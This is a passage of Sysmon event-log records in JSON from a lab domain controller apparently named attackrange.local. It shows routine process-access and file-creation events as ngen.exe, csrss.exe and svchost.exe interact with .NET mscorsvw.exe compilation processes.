C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:39.147","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-225D-5F25-0000-0010D4100E00}","TargetProcessId":"2152","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7852,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:39.162\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-228F-5F25-0000-0010625A0F00}\r\nTargetProcessId: 2152\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:39.162","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-228F-5F25-0000-0010625A0F00}","TargetProcessId":"2152","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7853,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:39.209\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2257-5F25-0000-00104CAD0D00}\r\nTargetProcessId: 4168\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:39.209","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2257-5F25-0000-00104CAD0D00}","TargetProcessId":"4168","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7854,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:39.209\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2257-5F25-0000-00104CAD0D00}\r\nTargetProcessId: 4168\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:39.209","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2257-5F25-0000-00104CAD0D00}","TargetProcessId":"4168","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7855,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:39.225\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-228F-5F25-0000-0010DA5D0F00}\r\nTargetProcessId: 4168\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:39.225","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-228F-5F25-0000-0010DA5D0F00}","TargetProcessId":"4168","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7856,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:39.490\r\nProcessGuid: {41C8662E-228F-5F25-0000-0010DA5D0F00}\r\nProcessId: 4168\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1048-0\\System.Management.Instrumentation.dll\r\nCreationUtcTime: 2020-08-01 08:06:39.490","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:39.490","ProcessGuid":"{41C8662E-228F-5F25-0000-0010DA5D0F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1048-0\\System.Management.Instrumentation.dll","CreationUtcTime":"2020-08-01 08:06:39.490","EventReceivedTime":"2020-08-01 08:06:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7857,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:39.537\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-228F-5F25-0000-00106E610F00}\r\nTargetProcessId: 4396\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:39.537","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-228F-5F25-0000-00106E610F00}","TargetProcessId":"4396","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7858,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:39.537\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-228F-5F25-0000-00106E610F00}\r\nTargetProcessId: 4396\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:39.537","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-228F-5F25-0000-00106E610F00}","TargetProcessId":"4396","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7859,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:39.537\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-228F-5F25-0000-00106E610F00}\r\nTargetProcessId: 4396\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:39.537","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-228F-5F25-0000-00106E610F00}","TargetProcessId":"4396","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7860,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:39.584\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-228F-5F25-0000-0010F8640F00}\r\nTargetProcessId: 1476\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: 